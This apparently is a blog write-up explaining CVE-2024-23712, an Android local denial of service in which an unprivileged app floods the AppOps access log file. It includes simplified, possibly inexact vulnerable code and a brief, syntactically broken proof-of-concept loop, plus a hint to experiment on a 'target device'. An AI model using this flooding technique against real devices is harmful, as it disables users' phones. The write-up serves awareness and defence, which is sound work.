Android is celebrated for its balance between openness and security, but no operating system is immune from bugs. One of the recent discoveries, CVE-2024-23712, sheds light on a surprisingly simple avenue for causing a local Denial of Service (DoS) without any special privileges or direct user interaction. Let’s explore what this vulnerability is, how it’s exploited, and what can be done to mitigate it.
What is CVE-2024-23712?
CVE-2024-23712 is a vulnerability found in multiple functions of the AppOpsService.java file in Android. It enables a local attacker (an app running without any special permissions) to saturate the contents of /data/system/appops_accesses.xml. This large file exhausts the system's storage or resources, causing core services to malfunction or crash — the classic recipe for a Denial of Service.
Importantly, this threat needs no extra execution privileges and no user interaction. If an app is on the device, it can trigger this flaw in the background.
The Role of AppOpsService.java
AppOpsService manages AppOps, which track and control the operations that apps perform (like accessing the camera or location). Each operation access can be logged. This logging happens in /data/system/appops_accesses.xml.
The problem occurs because there is no effective limit on how many entries can be written to that XML file for each app. A malicious app, therefore, can bombard the AppOps system with requests, causing entries to balloon and swell the XML log file.
Here’s a simplified look at a function in AppOpsService.java that records accesses
@GuardedBy("this")
public void recordAccess(int uid, String packageName, int op, long timestamp) {
// Log the access in memory
AppOpsAccess access = new AppOpsAccess(uid, packageName, op, timestamp);
mAccesses.add(access);
// Write to disk
writeAccesses();
}
private void writeAccesses() {
// Serialize all accesses to /data/system/appops_accesses.xml
File file = new File("/data/system/appops_accesses.xml");
try (FileWriter writer = new FileWriter(file)) {
for (AppOpsAccess access : mAccesses) {
writer.write(access.toXmlString());
}
}
}
What’s missing?
There’s no guard rail here. Each time an app performs an operation, an entry is added. There is no routine cleanup or maximum size enforcement.
Spam AppOps Requests:
The app repeatedly triggers AppOps-sensitive operations (like requesting location or sensor data) in a tight loop.
AppOpsService Logs Feverishly:
Each operation is dutifully logged into /data/system/appops_accesses.xml, growing the file rapidly.
Here’s a super-simplified PoC in Java for an Android app
public class BombAppOpsThread extends Thread {
@Override
public void run() {
for (int i = ; i < 100000; ++i) {
// e.g., Initiate a dummy operation that triggers an AppOp record
// This might be like requesting location or similar
context.getSystemService(LocationManager.class).getLastKnownLocation("gps");
}
}
}
Note: Even without location permission, many APIs still trigger AppOps records — experiment to find which ones work on your target device!
Real-World Impact
* No root needed: Any app can do it.
* No user interaction: It can run in background.
* Availability Attack: The device may become slow, unusable, or need a factory reset to recover.
References & More Reading
- CVE-2024-23712 on NVD
- AOSP Source for AppOpsService.java
- Android Security Bulletins
Be wary of new apps: Don’t install random APKs from unreliable sources.
- Reset if needed: If you’re stuck in a DoS situation, a factory reset (though painful) will restore your device.
Conclusion
CVE-2024-23712 highlights how even basic logging mechanisms in core services can be weaponized if not properly bounded. If you’re a developer or security researcher, keep an eye out for unlimited logs and lack of resource control — history shows these can have big consequences.
Stay safe, and as always, keep your devices patched and your app sources trustworthy!
*This write-up is for educational and awareness purposes only. Misuse of this information may be illegal and unethical.*
Timeline
Published on: 05/07/2024 21:15:08 UTC
Last modified on: 08/01/2024 23:13:07 UTC